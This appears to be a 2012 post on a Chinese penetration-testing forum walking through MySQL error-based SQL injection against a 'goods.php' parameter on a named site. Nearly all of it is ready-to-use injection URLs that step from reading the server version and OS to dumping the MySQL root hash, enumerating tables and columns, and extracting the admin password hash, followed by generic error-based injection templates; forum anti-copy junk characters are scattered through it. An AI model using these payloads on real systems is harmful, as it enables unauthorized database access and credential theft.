找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2447|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
判断版本号 : H; b9 V3 a* |- _  N
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23) g. d7 d% T6 Q: E
" q. t- m8 k8 \
判断系统; f/ ^. W& Q2 {8 h6 g2 E) j

& K4 j- f9 m1 |5 f' H9 C& |8 r6 whttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
4 L1 D" j. z1 K+ m9 Z1 a# {0 Y3 }$ G- y& `; W: s

7 i1 @" Q) r$ y$ T9 }) l2 G! |6 ~6 ?2 w6 _$ M7 {5 q
当前 user()
+ P0 I, `4 l$ J& I+ V2 v2 x  S( z  \* {1 N3 \+ V
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23$ P8 Y/ b8 {5 M. S7 s1 L
6 Y) [9 m1 d: n0 h! y& G
. G5 d: Z  o  G* v: d' o4 ?
* _/ y: X% O/ e( m
当前 database(): s$ G, w* X+ U( _; P5 {0 e$ \
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
# c3 Y& H. @! }& u# T7 I
  l" H3 ~' |4 i$ u- \; O% ~$ L; s( `4 f3 p4 m7 V; y
; X& D/ B" f- L% s
; ], m: L, ], p' [' u
root hash
7 C# g8 u9 k- r( Z
/ s  a: E1 k! |" P8 _( B2 mhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%231 j; s3 k6 L3 X% ^) b
0 g( s4 ~) f! v$ R7 ]

& }4 R! o8 X' E# |; W( W- S0 D! B" e# l- q3 m# l8 g0 r
当前 数据库表名
; i: |: ^' j0 t$ H. C7 U
' a2 J  C0 x8 f9 |. ~! P- Q: P; Rhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
% ]' \" n9 z# L# \2 Q, j) c' L) V" c7 R7 C; P$ a6 ?2 D
/ e; f' u4 D- e7 c7 c

1 p/ W" @3 ^& P. m) o6 p当前 数据库 user_name 字段$ b$ L' Q' k7 W- @, I( ~) }
, D7 R- L' S: d
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
+ H5 [1 k2 m4 f- e8 n+ l0 F# J$ \3 _0 l; b) R, g" W
当前 数据库 字段 password
# ]( z* E" o0 H2 ~" B" |% z; Shttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
9 o; [4 K1 [% W6 w& ]/ y
* A5 o- {5 z/ _" b5 u- d3 p
9 ~& d4 d* ^9 }9 [$ K4 W( l# b& S  {1 _
获得 admin passwd(md5)
5 H- l) w4 i  y% j2 @% f  @. L+ B4 P, X3 Q+ `- C3 o

0 V% \& O$ q; mhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
/ H6 X& V! }; t! }0 W# e0 K. r: ~  b) I. S; R
报错注射
5 H6 S3 n, Q: r! N! S, uSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
* I! Z% W5 x0 q  \
# N1 Y6 y* g( ~SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
5 B9 K  T  u6 E" P! `5 t1 c- N8 k) l4 U4 X5 r
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表